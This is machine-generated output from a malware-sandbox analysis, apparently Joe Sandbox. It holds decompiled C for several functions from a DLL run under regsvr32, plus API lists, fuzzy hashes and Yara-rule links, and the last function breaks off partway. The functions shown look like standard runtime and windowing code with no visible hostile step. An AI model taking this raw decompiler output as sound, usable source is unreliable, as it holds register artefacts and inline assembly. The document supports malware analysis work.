C-Code - Quality: 53%

			E100394B0(intOrPtr __ecx, intOrPtr __edx) {
				CHAR* _t94;
				void* _t100;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t114;
				void* _t116;
				void* _t117;
				void* _t120;
				signed short _t123;
				signed int _t125;
				signed int _t128;
				void* _t134;
				char _t140;
				CHAR* _t144;
				intOrPtr* _t147;
				void* _t149;
				void* _t151;
				intOrPtr _t153;
				signed short* _t156;
				void* _t157;
				CHAR* _t159;
				int _t161;
				char* _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				CHAR* _t171;
				char* _t174;
				CHAR* _t182;

				_t153 = __edx;
				_t148 = __ecx;
				E10011BF0(0x1003b2f6, _t168);
				_t171 = _t170 - 0x2c;
				_t144 =  *(_t168 + 8);
				_t94 = _t144[8];
				 *(_t168 - 0x10) = _t171;
				 *((intOrPtr*)(_t168 - 0x20)) = __ecx;
				 *(_t168 - 0x11) = 0;
				 *(_t168 + 8) = _t94;
				if(_t94 == 0) {
					 *(_t168 + 8) = _t168 - 0x11;
				}
				_t161 = lstrlenA( *(_t168 + 8));
				 *(_t168 - 0x18) = _t144[0x10];
				 *(_t168 - 0x1c) = _t144[0xc];
				if(( *(_t168 + 0xc) & 0x0000000c) == 0) {
					L7:
					_t145 =  *(_t168 + 0x14);
					_t100 = E10001000(_t148, ( *(_t168 + 0x14))[8] << 4);
					_pop(_t149);
					if(_t100 == 0) {
						L9:
						_t101 = 0x8007000e;
						L47:
						 *[fs:0x0] =  *((intOrPtr*)(_t168 - 0xc));
						return _t101;
					}
					E10010B20((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
					 *(_t168 - 0x10) = _t171;
					 *(_t168 + 0xc) = _t171;
					E10011C50( *(_t168 + 0xc), 0, _t145[8] << 4);
					_t174 =  &(_t171[0xc]);
					_t156 = E10039215( *(_t168 + 8),  *(_t168 - 0x1c));
					_t38 =  &(_t156[8]); // 0x10
					_t165 = _t38;
					_t108 = E10001000(_t149, _t38);
					_pop(_t151);
					if(_t108 != 0) {
						E10010B20( &(_t165[1]) & 0xfffffffc, _t151);
						 *(_t168 - 0x10) = _t174;
						_t166 = _t174;
						_t114 = E10039257( *((intOrPtr*)(_t168 - 0x20)), _t166,  *(_t168 + 8), _t168 - 0x34,  *(_t168 - 0x1c), _t145,  *((intOrPtr*)(_t168 + 0x18)),  *(_t168 + 0xc));
						_t147 = 0;
						 *((intOrPtr*)(_t168 + 0x18)) = _t114;
						if(_t114 != 0) {
							L17:
							_t166 =  *(_t168 + 0x14);
							 *(_t168 - 4) =  *(_t168 - 4) | 0xffffffff;
							_t157 = 0;
							if(_t166[8] <= 0) {
								L20:
								_t101 =  *((intOrPtr*)(_t168 + 0x18));
								if(_t101 != 0) {
									goto L47;
								}
								_t156 =  *(_t168 + 0x10);
								if(_t156 == 0) {
									_t116 = ( *(_t168 - 0x1c) & 0x0000ffff) - 8;
									if(_t116 == 0) {
										if(_t147 != 0) {
											__imp__#6(_t147);
										}
										L46:
										_t101 = 0;
										goto L47;
									}
									_t117 = _t116 - 1;
									if(_t117 == 0) {
										L41:
										if(_t147 != 0) {
											 *((intOrPtr*)( *_t147 + 8))(_t147);
										}
										goto L46;
									}
									_t120 = _t117 - 3;
									if(_t120 == 0) {
										__imp__#9(_t168 - 0x34);
										goto L46;
									}
									if(_t120 != 1) {
										goto L46;
									}
									goto L41;
								}
								_t123 =  *(_t168 - 0x1c);
								 *_t156 = _t123;
								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
								if(_t125 > 0x13) {
									goto L46;
								}
								switch( *((intOrPtr*)(_t125 * 4 +  &M10039776))) {
									case 0:
										L35:
										 *(__edi + 8) = __bx;
										goto L46;
									case 1:
										 *(__edi + 8) = __ebx;
										goto L46;
									case 2:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 3:
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 4:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										__eax =  *(__ebp - 0x30);
										 *(__edi + 0xc) =  *(__ebp - 0x30);
										goto L46;
									case 5:
										__ebx =  ~__ebx;
										asm("sbb ebx, ebx");
										goto L35;
									case 6:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L46;
									case 7:
										goto L46;
									case 8:
										 *(__edi + 8) = __bl;
										goto L46;
								}
							}
							do {
								__imp__#9( *(_t168 + 0xc));
								 *(_t168 + 0xc) =  &(( *(_t168 + 0xc))[0x10]);
								_t157 = _t157 + 1;
							} while (_t157 < _t166[8]);
							goto L20;
						}
						_t128 =  *(_t168 - 0x1c) & 0x0000ffff;
						 *(_t168 - 4) = 0;
						if(_t128 == 4) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							 *(_t168 + 8) = _t182;
							 *(_t168 - 0x34) =  *(_t168 + 8);
							goto L17;
						}
						if(_t128 == 5) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							asm("fst qword [ebp-0x24]");
							L27:
							 *(_t168 - 0x34) = _t182;
							goto L17;
						}
						if(_t128 == 7) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							E1003A087();
							asm("fst qword [ebp-0x24]");
							goto L27;
						}
						if(_t128 <= 0x13 || _t128 > 0x15) {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							_t147 = E1003A087();
						} else {
							_push(_t156);
							_push(_t166);
							_push( *(_t168 - 0x18));
							 *(_t168 - 0x34) = E1003A087();
							 *((intOrPtr*)(_t168 - 0x30)) = _t153;
						}
						goto L17;
					}
					goto L9;
				}
				_t17 = _t161 + 3; // 0x3
				_t158 = _t17;
				_t134 = E10001000(_t148, _t17);
				_pop(_t148);
				if(_t134 == 0) {
					goto L9;
				}
				E10010B20(_t158 + 0x00000003 & 0xfffffffc, _t148);
				 *(_t168 - 0x10) = _t171;
				_t159 = _t171;
				E10011440(_t159,  *(_t168 + 8), _t161);
				_t140 = _t144[0xc];
				_t171 =  &(_t171[0xc]);
				 *(_t168 + 8) = _t159;
				if(_t140 == 8) {
					_t140 = 0xe;
				}
				_t159[_t161] = 0xff;
				_t167 = _t161 + 1;
				 *(_t168 - 0x1c) =  *(_t168 - 0x1c) & 0x00000000;
				_t159[_t167] = _t140;
				_t159[_t167 + 1] = 0;
				 *(_t168 - 0x18) = _t144[0x14];
				goto L7;
			}

0x100394b0
0x100394b0
0x100394b5
0x100394ba
0x100394be
0x100394c1
0x100394c8
0x100394cb
0x100394ce
0x100394d2
0x100394d5
0x100394da
0x100394da
0x100394ea
0x100394ef
0x100394f6
0x100394fa
0x10039554
0x10039554
0x1003955e
0x10039565
0x10039566
0x100395aa
0x100395aa
0x10039762
0x10039768
0x10039773
0x10039773
0x10039576
0x1003957b
0x1003957e
0x10039587
0x1003958c
0x1003959a
0x1003959c
0x1003959c
0x100395a0
0x100395a7
0x100395a8
0x100395bc
0x100395c4
0x100395c7
0x100395db
0x100395e0
0x100395e4
0x100395e7
0x10039625
0x10039625
0x10039628
0x1003962c
0x10039631
0x1003964c
0x1003964c
0x10039651
0x00000000
0x00000000
0x10039657
0x1003965c
0x1003972d
0x10039730
0x10039757
0x1003975a
0x1003975a
0x10039760
0x10039760
0x00000000
0x10039760
0x10039732
0x10039733
0x1003973d
0x1003973f
0x10039744
0x10039744
0x00000000
0x1003973f
0x10039735
0x10039738
0x1003974d
0x00000000
0x1003974d
0x1003973b
0x00000000
0x00000000
0x00000000
0x1003973b
0x10039662
0x10039665
0x1003966b
0x10039671
0x00000000
0x00000000
0x10039677
0x00000000
0x1003971a
0x1003971a
0x00000000
0x00000000
0x100396f3
0x00000000
0x00000000
0x10039706
0x10039709
0x00000000
0x00000000
0x10039711
0x00000000
0x00000000
0x100396f8
0x100396fb
0x100396fe
0x10039701
0x00000000
0x00000000
0x10039716
0x10039718
0x00000000
0x00000000
0x10039723
0x10039724
0x10039725
0x10039726
0x00000000
0x00000000
0x00000000
0x00000000
0x100396ee
0x00000000
0x00000000
0x10039677
0x10039639
0x1003963c
0x10039642
0x10039646
0x10039647
0x00000000
0x10039639
0x100395e9
0x100395f0
0x100395f3
0x100396b0
0x100396b1
0x100396b2
0x100396b5
0x100396ba
0x100396c0
0x00000000
0x100396c0
0x100395fc
0x1003969b
0x1003969c
0x1003969d
0x100396a0
0x100396a5
0x100396a8
0x100396a8
0x00000000
0x100396a8
0x10039605
0x1003968c
0x1003968d
0x1003968e
0x10039691
0x10039696
0x00000000
0x10039696
0x1003960e
0x1003967e
0x1003967f
0x10039680
0x10039688
0x10039615
0x10039615
0x10039616
0x10039617
0x1003961f
0x10039622
0x10039622
0x00000000
0x1003960e
0x00000000
0x100395a8
0x100394fc
0x100394fc
0x10039500
0x10039507
0x10039508
0x00000000
0x00000000
0x10039516
0x1003951b
0x1003951e
0x10039525
0x1003952a
0x1003952e
0x10039535
0x10039538
0x1003953c
0x1003953c
0x1003953d
0x10039541
0x10039542
0x10039546
0x10039549
0x10039551
0x00000000

APIs

__EH_prolog.LIBCMT ref: 100394B5
lstrlenA.KERNEL32(?,?,00000000), ref: 100394E0
VariantClear.OLEAUT32(0000000C), ref: 1003963C

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClearH_prologVariantlstrlen
String ID:
API String ID: 2416264355-0
Opcode ID: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
Instruction ID: 794d22016aebeea8945113baaba77667614d3c7e1eb394332e3a898872445e5b
Opcode Fuzzy Hash: 01d55cbef57070eba50bc1bacdd47ccffadd2fabc5e95ff73a26932456179a65
Instruction Fuzzy Hash: 8381B13590465AEFCF12CFA9C881A9EBBB5FF05391F208115F854AF291D735EA90CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10018BEF Relevance: 7.7, APIs: 5, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E10018BEF(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E1001519D(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
							_t15 = _t142 - 1; // -71
							_v16 = _t15;
							_v8 = _t142;
							asm("cdq");
							_t164 = 0x64;
							_t165 = 4;
							asm("cdq");
							_t28 = _v16 / _t165 - 0x11; // 0xd4
							asm("cdq");
							_t29 = _t142 - 0x46; // -140
							asm("cdq");
							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
							asm("sbb edx, ebx");
							_t138 = 0x15180;
							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
							asm("adc [ebp-0x10], edx");
							_t180 = _v20;
							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
								asm("cdq");
								_t143 = 4;
								if(_v8 % _t143 != 0) {
									L19:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										goto L21;
									}
									goto L20;
								}
								asm("cdq");
								_t149 = 0x64;
								_t158 = _v8 % _t149;
								if(_v8 % _t149 != 0) {
									goto L20;
								}
								goto L19;
							} else {
								_t125 = _v16;
								_v8 = _t125;
								_t168 = _t168 + 0x1e13380;
								asm("adc dword [ebp-0x10], 0x0");
								asm("cdq");
								_t150 = 4;
								if(_t125 % _t150 != 0) {
									L15:
									asm("cdq");
									_t158 = (_v8 + 0x76c) % 0x190;
									if((_v8 + 0x76c) % 0x190 != 0) {
										L21:
										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
										asm("cdq");
										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
										asm("adc [ebp-0x10], edx");
										_t159 = 0x1004ce98;
										if(_v12 == 0) {
											_t159 = 0x1004cecc;
										}
										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
										_t146 = 1;
										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
											L27:
											_t147 = _t146 - 1;
											 *(_t173 + 0x10) = _t147;
											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
											_t148 = 7;
											asm("cdq");
											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
											asm("cdq");
											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
											asm("adc [ebp-0x10], edx");
											_t120 = E10013780(_t170, _v20, 0x3c, 0);
											 *(_t173 + 4) = _t120;
											 *_t173 = _t170 - _t120 * 0x3c;
											 *((intOrPtr*)(_t173 + 0x20)) = 0;
											return _t173;
										} else {
											_t140 = _t112;
											do {
												_t146 = _t146 + 1;
											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
											_t138 = 0x15180;
											goto L27;
										}
									}
									L16:
									_t168 = _t168 + _t138;
									asm("adc dword [ebp-0x10], 0x0");
									L20:
									_v12 = 1;
									goto L21;
								}
								asm("cdq");
								_t152 = 0x64;
								_t158 = _v8 % _t152;
								if(_v8 % _t152 != 0) {
									goto L16;
								}
								goto L15;
							}
						}
						_t132 = E100107B6(0x24);
						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
						if(_t132 != 0) {
							goto L9;
						}
						_t173 = 0x1004f744;
						goto L10;
					}
				}
			}

0x10018bf5
0x10018bf8
0x10018bfd
0x10018c02
0x10018c04
0x10018c07
0x10018c0a
0x10018c0f
0x10018c11
0x10018c13
0x10018e0d
0x00000000
0x10018c23
0x10018c23
0x10018c29
0x00000000
0x10018c39
0x10018c3d
0x10018c55
0x10018c55
0x10018c58
0x10018c68
0x10018c6b
0x10018c71
0x10018c7b
0x10018c7e
0x10018c81
0x10018c88
0x10018c89
0x10018c8e
0x10018c9b
0x10018c9e
0x10018ca2
0x10018ca5
0x10018caa
0x10018cad
0x10018cb4
0x10018cb8
0x10018cc8
0x10018cca
0x10018ccd
0x10018cd1
0x10018d21
0x10018d22
0x10018d27
0x10018d36
0x10018d3e
0x10018d44
0x10018d48
0x00000000
0x00000000
0x00000000
0x10018d48
0x10018d2e
0x10018d2f
0x10018d30
0x10018d34
0x00000000
0x00000000
0x00000000
0x10018cd9
0x10018cd9
0x10018cdc
0x10018cdf
0x10018ce5
0x10018ceb
0x10018cec
0x10018cf1
0x10018d00
0x10018d08
0x10018d0e
0x10018d12
0x10018d51
0x10018d5a
0x10018d65
0x10018d68
0x10018d75
0x10018d77
0x10018d7e
0x10018d83
0x10018d85
0x10018d85
0x10018d8a
0x10018d8f
0x10018d93
0x10018da2
0x10018da2
0x10018da3
0x10018dab
0x10018db7
0x10018dc1
0x10018dc2
0x10018dd1
0x10018ddb
0x10018dde
0x10018dec
0x10018dee
0x10018df7
0x10018dfc
0x10018e04
0x10018e06
0x00000000
0x10018d95
0x10018d95
0x10018d97
0x10018d97
0x10018d98
0x10018d9d
0x00000000
0x10018d9d
0x10018d93
0x10018d14
0x10018d14
0x10018d16
0x10018d4a
0x10018d4a
0x00000000
0x10018d4a
0x10018cf8
0x10018cf9
0x10018cfa
0x10018cfe
0x00000000
0x00000000
0x00000000
0x10018cfe
0x10018cd1
0x10018c41
0x10018c49
0x10018c4c
0x00000000
0x00000000
0x10018c4e
0x00000000
0x10018c4e
0x10018c29

APIs

Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
String ID:
API String ID: 223281555-0
Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002D821 Relevance: 7.7, APIs: 5, Instructions: 204
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E1002D821(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				signed char _t75;
				signed int _t80;
				signed int _t81;
				signed int _t85;
				signed int _t87;
				void* _t95;
				intOrPtr _t125;
				intOrPtr _t133;
				void* _t147;
				void* _t151;
				intOrPtr _t155;
				void* _t158;
				void* _t160;

				_t147 = __edx;
				_t158 = _t160 - 0xb0;
				_t70 =  *0x1004c470; // 0xf256d946
				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
				_t125 = __ecx;
				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
					}
					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
					 *(_t125 + 0x7c) = _t75;
					if((_t75 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t158 - 0x58);
						E1002095F(_t155);
						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
					}
					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
						_t81 = _t80 & 0xfffffffe;
					} else {
						_t81 = _t80 | 0x00000001;
					}
					E100383D0(_t155, _t81);
					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
					}
					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
					if( *(_t158 + 0xbc) == 0) {
						_t57 = _t125 + 0x94; // 0x94
						_t150 = _t57;
						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
						_t85 =  *0x1004efa4; // 0x2
						_t151 = 0;
						_t87 =  *0x1004efa0; // 0x2
						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
					} else {
						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
						E10028E5A(_t125, _t158 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
						_push( *((intOrPtr*)(_t158 + 0xb8)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t158 - 0x70) = E1002CE2A(_t125);
						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
						_t151 = 0;
					}
					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
						E1000870E(_t155, _t125);
					}
					_t133 =  *((intOrPtr*)(_t155 + 0x88));
					if(_t133 != _t125) {
						if(_t133 != _t151) {
							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
								_t95 = 0;
							} else {
								_t95 = 1;
							}
							_push(_t95);
							_push(0xffffffff);
							goto L27;
						}
					} else {
						_push(_t151);
						_push( *(_t158 - 0x70));
						L27:
						_push(_t155);
						E1002D1B2(_t133);
					}
					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
					}
					E1002D14B(_t125, _t125, _t158, _t155);
					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
			}

0x1002d821
0x1002d822
0x1002d82f
0x1002d836
0x1002d83c
0x1002d84a
0x1002d84c
0x1002d85a
0x1002d886
0x1002d891
0x1002d891
0x1002d895
0x1002d8a2
0x1002d8a6
0x1002d8a9
0x1002d8ab
0x1002d8b3
0x1002d8b6
0x1002d8c2
0x1002d8c2
0x1002d8d5
0x1002d8e0
0x1002d8e7
0x1002d8e2
0x1002d8e2
0x1002d8e2
0x1002d8ed
0x1002d8f8
0x1002d8fb
0x1002d916
0x1002d91b
0x1002d91b
0x1002d922
0x1002d92c
0x1002d9b9
0x1002d9b9
0x1002d9c5
0x1002d9d1
0x1002d9d6
0x1002d9e0
0x1002d9e7
0x1002d9f2
0x1002d932
0x1002d93c
0x1002d948
0x1002d956
0x1002d966
0x1002d96e
0x1002d96f
0x1002d975
0x1002d97b
0x1002d97c
0x1002d97d
0x1002d980
0x1002d98c
0x1002d9aa
0x1002d9af
0x1002d9b5
0x1002d9b5
0x1002da08
0x1002da0d
0x1002da0d
0x1002da12
0x1002da1a
0x1002da24
0x1002da2c
0x1002da3b
0x1002da36
0x1002da38
0x1002da38
0x1002da3d
0x1002da3e
0x00000000
0x1002da3e
0x1002da1c
0x1002da1c
0x1002da1d
0x1002da40
0x1002da40
0x1002da41
0x1002da41
0x1002da49
0x1002da4f
0x1002da5a
0x1002da5a
0x1002da62
0x1002da6e
0x1002da6e
0x1002da8a

APIs

GetWindowRect.USER32 ref: 1002D84C
EqualRect.USER32 ref: 1002D872
IsWindowVisible.USER32 ref: 1002D900
CopyRect.USER32 ref: 1002D93C
GetParent.USER32(?), ref: 1002D9FA

Part of subcall function 1000870E: SetParent.USER32(?,00000000), ref: 1000871D

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$ParentWindow$CopyEqualVisible
String ID:
API String ID: 545338366-0
Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11

Uniqueness

Uniqueness Score: -1.00%

Function 10014691 Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014691(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
					_t88 =  *((intOrPtr*)(_t92 + 0xc));
					__eflags = _t88 - 0xffffffff;
					if(_t88 != 0xffffffff) {
						_t81 = 0;
						__eflags = 0;
						_a4 = 0;
						_t52 = _t69;
						do {
							_t74 =  *_t52;
							__eflags = _t74 - 0xffffffff;
							if(_t74 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t74 - _t81;
							if(_t74 >= _t81) {
								L41:
